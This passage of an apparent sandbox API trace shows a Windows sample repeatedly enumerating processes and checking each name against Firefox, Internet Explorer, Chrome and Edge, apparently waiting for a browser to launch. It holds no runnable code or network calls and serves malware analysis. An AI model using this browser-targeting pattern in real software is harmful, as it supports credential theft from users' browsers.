(lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.537] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0185.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0185.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0185.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0185.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0185.538] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0185.538] CloseHandle (hObject=0xd4) returned 1 [0185.538] Sleep (dwMilliseconds=0x3e8) [0186.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0186.564] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.565] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0186.565] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0186.565] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0186.565] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0186.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.565] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0186.565] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0186.565] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0186.565] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0186.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.566] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0186.566] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0186.566] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0186.566] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.566] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0186.566] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0186.566] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0186.566] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.567] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0186.567] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0186.567] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0186.567] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.567] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0186.567] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0186.567] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0186.567] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.568] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0186.568] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0186.568] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0186.568] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.569] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0186.569] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0186.569] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0186.569] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.569] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0186.569] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0186.569] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0186.569] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0186.570] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0186.570] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0186.570] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0186.570] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.570] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.570] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.570] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.570] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.571] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.572] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.573] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.573] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.573] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.573] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.573] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0186.573] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0186.573] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0186.573] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.574] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.575] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0186.575] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0186.575] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0186.575] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.575] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0186.575] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0186.575] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0186.575] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.576] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0186.576] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0186.576] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0186.576] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.577] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.577] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.577] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.577] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.577] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0186.577] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0186.577] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0186.577] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0186.578] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0186.578] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0186.578] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0186.578] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0186.578] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0186.578] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0186.578] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0186.578] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0186.579] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0186.579] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0186.579] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0186.579] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0186.579] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0186.579] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0186.579] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0186.579] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0186.580] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0186.580] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0186.580] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0186.580] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0186.580] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0186.580] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0186.581] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0186.581] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0186.581] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0186.581] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0186.581] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0186.581] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0186.582] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0186.582] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0186.582] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0186.582] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0186.582] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0186.582] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0186.582] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0186.582] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0186.583] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0186.583] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0186.583] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0186.583] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0186.583] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0186.583] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0186.583] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0186.583] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0186.584] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0186.584] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0186.584] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0186.584] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0186.585] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0186.585] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0186.585] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0186.585] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0186.585] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0186.585] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0186.585] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0186.585] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0186.586] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0186.586] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0186.586] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0186.586] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0186.586] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0186.586] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0186.586] lstrcmpiA (lpString1="dallasr.exe", 